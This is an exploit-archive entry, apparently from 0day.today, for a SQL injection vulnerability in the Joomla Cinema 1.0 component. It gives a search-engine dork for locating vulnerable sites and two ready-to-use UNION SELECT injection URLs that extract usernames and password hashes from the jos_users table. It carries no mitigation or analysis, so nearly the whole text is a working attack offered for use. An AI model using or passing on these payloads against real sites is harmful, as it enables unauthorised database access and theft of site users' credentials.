id: 2771
date: 03/23/2008
title: Joomla Component Cinema 1.0 Remote SQL Injection Vulnerability
author: S@BUN
cves: 

==============================================================
Joomla Component Cinema 1.0 Remote SQL Injection Vulnerability
==============================================================



##########################################
#
# Joomla Component com_cinema SQL Injection
#
###########################################
#
# DORK 1 : allinurl: "com_cinema"
#
###########################################
EXPLOiT 1 :

index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_users/*

EXPLOiT 2 :

index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,29,30,concat(username,0x3a,password)/**/from/**/jos_users/*

###########################################



#  0day.today [2023-03-25]  #